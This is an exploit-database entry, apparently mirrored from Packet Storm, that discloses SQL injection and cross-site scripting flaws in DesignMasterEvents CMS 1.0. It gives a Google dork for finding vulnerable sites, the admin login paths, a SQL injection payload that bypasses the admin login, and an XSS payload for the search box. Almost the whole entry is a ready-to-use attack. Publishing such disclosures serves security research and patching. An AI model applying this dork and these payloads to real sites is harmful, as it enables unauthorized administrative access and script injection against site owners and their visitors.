Exploit for DesignMasterEvents CMS 1.0 SQL Injection / Cross Site Scripting

Name: Exploit for DesignMasterEvents CMS 1.0 SQL Injection / Cross Site Scripting
Rating: 5 (172 reviews)

2020-03-30 | CVSS 0.4

## https://sploitus.com/exploit?id=PACKETSTORM:156959
# Exploit Title: DesignMasterEvents Conference management CMS SQL Injection Auth Bypass & XSS Vulnerability  
# Google Dork: intext:"by :Design Master Events"  
# Date: 2020-03-28  
# Exploit Author: @ThelastVvV  
# Vendor Homepage: http://www.designmasterevents.com  
# Version: 1.0  
# Tested on: Ubuntu  
  
---------------------------------------------------------  
  
PoC 1:  
Authentication Bypass / SQL Injection  
  
  
# Admin Control Panel Paths :  
www.anysite.com/admin/  
www.anysite.com/admin/login.php  
  
Payload(s)  
USERNAME: admin' or '1' = '1'; -- -   
  
PASSWORD: vvv  
  
the SQL injection attack has resulted in a bypass of the login, and we are now authenticated as "admin".  
  
  
PoC 2 :  
  
XSS Vulnerability  
  
Payload(s) :  
  
In Search box use payload:  
  
"><img src=x onerror=prompt(document.domain);>  
  
www.anysite.com/certificate.php